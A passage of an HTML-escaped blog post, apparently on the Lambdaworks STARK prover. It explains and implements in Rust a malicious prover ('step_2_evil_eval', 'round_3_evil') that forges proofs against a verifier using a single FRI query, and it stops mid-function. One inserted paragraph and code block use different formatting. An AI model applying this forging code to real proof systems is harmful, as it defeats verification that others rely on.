&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let trace_frame_evaluations = &amp;amp;round_3_result.trace_ood_evaluations;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; Compute the sum of all the deep composition polynomial trace terms.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; There is one term for every trace polynomial and every row in the frame.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; ∑ ⱼₖ [ 𝛾ₖ ( tⱼ − tⱼ(z) ) &#x2F; ( X − zgᵏ )]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let mut trace_terms = Polynomial::zero();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    for (i, t_j) in trace_polys.iter().enumerate() {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        let i_times_trace_frame_evaluation = i * trace_frame_evaluations.len();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        let iter_trace_gammas = trace_terms_gammas&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            .iter()&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            .skip(i_times_trace_frame_evaluation);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        for ((evaluations, offset), elemen_trace_gamma) in trace_frame_evaluations&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            .iter()&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            .zip(transition_offsets)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            .zip(iter_trace_gammas)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            let t_j_z = evaluations[i].clone();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            let z_shifted = z * primitive_root.pow(*offset);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            let mut poly = t_j - t_j_z;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            poly.ruffini_division_inplace(&amp;amp;z_shifted);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            trace_terms = trace_terms + poly * elemen_trace_gamma;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    h_1_term + h_2_term + trace_terms&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;which uses the following function to interpolate:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;pub fn interp_from_num_denom&amp;lt;F: IsFFTField&amp;gt;(&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    num: &amp;amp;Polynomial&amp;lt;FieldElement&amp;lt;F&amp;gt;&amp;gt;,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    denom: &amp;amp;Polynomial&amp;lt;FieldElement&amp;lt;F&amp;gt;&amp;gt;,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    domain: &amp;amp;Domain&amp;lt;F&amp;gt;,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;) -&amp;gt; Polynomial&amp;lt;FieldElement&amp;lt;F&amp;gt;&amp;gt; {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let target_deg = domain.lde_roots_of_unity_coset.len() &#x2F; domain.blowup_factor;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let num_evals = evaluate_polynomial_on_lde_domain(&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        num,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        domain.blowup_factor,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        domain.interpolation_domain_size,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        &amp;amp;domain.coset_offset,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    )&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    .unwrap();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let denom_evals = evaluate_polynomial_on_lde_domain(&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        denom,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        domain.blowup_factor,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        domain.interpolation_domain_size,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        &amp;amp;domain.coset_offset,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    )&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    .unwrap();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let evals: Vec&amp;lt;_&amp;gt; = num_evals&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        .iter()&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        .zip(denom_evals)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        .map(|(num, denom)| num &#x2F; denom)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        .collect();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    Polynomial::interpolate(&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        &amp;amp;domain.lde_roots_of_unity_coset[..target_deg],&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        &amp;amp;evals[..target_deg],&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    )&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    .unwrap()&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;This way, we can choose the $n$ points where the fake DEEP composition polynomial will pass all the tests. Since the verifier chooses among $\beta n$ points, the prover gets a $1&#x2F;\beta$ chance of passing the test.&lt;&#x2F;p&gt;
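&lt;p&gt;To see why a single query is fatal, note that the fake polynomial agrees with a low-degree one on $n$ of the $\beta n$ domain points, so each independent query catches the cheat with probability only $1 - 1&#x2F;\beta$. A hedged back-of-the-envelope sketch (the helper name below is ours, not a Lambdaworks API):&lt;&#x2F;p&gt;

```rust
// Rough model of FRI query soundness in this attack: a fake DEEP
// composition polynomial matching a low-degree polynomial on n of the
// beta*n evaluation points survives one uniform query with probability
// 1/beta, hence q independent queries with (1/beta)^q.
// `security_bits` is a hypothetical helper for illustration only.
fn security_bits(blowup_factor: f64, num_queries: u32) -> f64 {
    // -log2((1/beta)^q) = q * log2(beta)
    num_queries as f64 * blowup_factor.log2()
}

fn main() {
    let beta = 4.0; // a typical small blowup factor, chosen for illustration
    // With one query the cheating prover passes with probability 1/4:
    println!("1 query   -> {} bits of security", security_bits(beta, 1));
    // Many queries drive the soundness error down exponentially:
    println!("64 queries -> {} bits of security", security_bits(beta, 64));
}
```

This counts only the query-phase error; the full FRI soundness analysis (including the sharper bounds discussed earlier in this article) also accounts for the commit-phase folding.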
&lt;p&gt;We can now create a malicious prover that will likely pass the verifier’s checks, even when it uses a false execution trace. Step 2 of the prover is modified to calculate the exact composition polynomial evaluation:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;fn step_2_evil_eval&amp;lt;F: IsFFTField, A: AIR&amp;lt;Field = F&amp;gt;&amp;gt;(&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    air: &amp;amp;A,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    domain: &amp;amp;Domain&amp;lt;F&amp;gt;,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    transition_coeffs: &amp;amp;[(FieldElement&amp;lt;F&amp;gt;, FieldElement&amp;lt;F&amp;gt;)],&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    boundary_coeffs: &amp;amp;[(FieldElement&amp;lt;F&amp;gt;, FieldElement&amp;lt;F&amp;gt;)],&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    rap_challenges: &amp;amp;A::RAPChallenges,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    z: &amp;amp;FieldElement&amp;lt;F&amp;gt;,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    trace_ood_frame_evaluations: &amp;amp;Frame&amp;lt;F&amp;gt;,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;) -&amp;gt; FieldElement&amp;lt;F&amp;gt; {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; BEGIN TRACE &amp;lt;-&amp;gt; Composition poly consistency evaluation check&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; These are H_1(z^2) and H_2(z^2)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let boundary_constraints = air.boundary_constraints(rap_challenges);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F;let n_trace_cols = air.context().trace_columns;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; special cases.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let trace_length = air.trace_length();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let composition_poly_degree_bound = air.composition_poly_degree_bound();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let boundary_term_degree_adjustment = composition_poly_degree_bound - trace_length;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let number_of_b_constraints = boundary_constraints.constraints.len();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; Following naming conventions from https:&#x2F;&#x2F;www.notamonadtutorial.com&#x2F;diving-deep-fri&#x2F;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let (boundary_c_i_evaluations_num, mut boundary_c_i_evaluations_den): (&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        Vec&amp;lt;FieldElement&amp;lt;F&amp;gt;&amp;gt;,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        Vec&amp;lt;FieldElement&amp;lt;F&amp;gt;&amp;gt;,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    ) = (0..number_of_b_constraints)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        .map(|index| {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            let step = boundary_constraints.constraints[index].step;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            let point = &amp;amp;domain.trace_primitive_root.pow(step as u64);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            let trace_idx = boundary_constraints.constraints[index].col;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            let trace_evaluation = &amp;amp;trace_ood_frame_evaluations.get_row(0)[trace_idx];&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            let boundary_zerofier_challenges_z_den = z - point;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            let boundary_quotient_ood_evaluation_num =&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                trace_evaluation - &amp;amp;boundary_constraints.constraints[index].value;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            (&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                boundary_quotient_ood_evaluation_num,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                boundary_zerofier_challenges_z_den,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            )&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        })&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        .collect::&amp;lt;Vec&amp;lt;_&amp;gt;&amp;gt;()&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        .into_iter()&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        .unzip();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    FieldElement::inplace_batch_inverse(&amp;amp;mut boundary_c_i_evaluations_den);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let boundary_degree_z = z.pow(boundary_term_degree_adjustment);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let boundary_quotient_ood_evaluation: FieldElement&amp;lt;F&amp;gt; = boundary_c_i_evaluations_num&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        .iter()&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        .zip(&amp;amp;boundary_c_i_evaluations_den)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        .zip(boundary_coeffs)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        .map(|((num, den), (alpha, beta))| num * den * (alpha * &amp;amp;boundary_degree_z + beta))&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        .fold(FieldElement::&amp;lt;F&amp;gt;::zero(), |acc, x| acc + x);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let transition_ood_frame_evaluations =&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        air.compute_transition(trace_ood_frame_evaluations, rap_challenges);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let divisor_x_n = (z.pow(trace_length) - FieldElement::&amp;lt;F&amp;gt;::one()).inv();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let denominators = air&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        .transition_exemptions_verifier()&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        .iter()&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        .map(|poly| poly.evaluate(z) * &amp;amp;divisor_x_n)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        .collect::&amp;lt;Vec&amp;lt;FieldElement&amp;lt;F&amp;gt;&amp;gt;&amp;gt;();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let degree_adjustments = air&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        .context()&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        .transition_degrees()&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        .iter()&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        .map(|transition_degree| {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            let degree_adjustment =&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                composition_poly_degree_bound - (trace_length * (transition_degree - 1));&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            z.pow(degree_adjustment)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        })&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        .collect::&amp;lt;Vec&amp;lt;FieldElement&amp;lt;F&amp;gt;&amp;gt;&amp;gt;();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let transition_c_i_evaluations_sum =&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        ConstraintEvaluator::&amp;lt;F, A&amp;gt;::compute_constraint_composition_poly_evaluations_sum(&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            &amp;amp;transition_ood_frame_evaluations,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            &amp;amp;denominators,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            &amp;amp;degree_adjustments,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            transition_coeffs,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        );&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &amp;amp;boundary_quotient_ood_evaluation + transition_c_i_evaluations_sum&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Then, round_3 is changed to&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;fn round_3_evil&amp;lt;F: IsFFTField, A: AIR&amp;lt;Field = F&amp;gt;&amp;gt;(&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    air: &amp;amp;A,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    domain: &amp;amp;Domain&amp;lt;F&amp;gt;,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    round_1_result: &amp;amp;Round1&amp;lt;F, A&amp;gt;,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    z: &amp;amp;FieldElement&amp;lt;F&amp;gt;,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    boundary_coeffs: &amp;amp;[(FieldElement&amp;lt;F&amp;gt;, FieldElement&amp;lt;F&amp;gt;)],&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    transition_coeffs: &amp;amp;[(FieldElement&amp;lt;F&amp;gt;, FieldElement&amp;lt;F&amp;gt;)],&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;) -&amp;gt; Round3&amp;lt;F&amp;gt;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;where&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    FieldElement&amp;lt;F&amp;gt;: ByteConversion,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;{&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let trace_ood_evaluations = Frame::get_trace_evaluations(&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        &amp;amp;round_1_result.trace_polys,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        z,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        &amp;amp;air.context().transition_offsets,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        &amp;amp;domain.trace_primitive_root,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    );&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let (composition_poly_even_ood_evaluation, composition_poly_odd_ood_evaluation) = {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        let trace_ood_frame_evaluations = Frame::new(&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
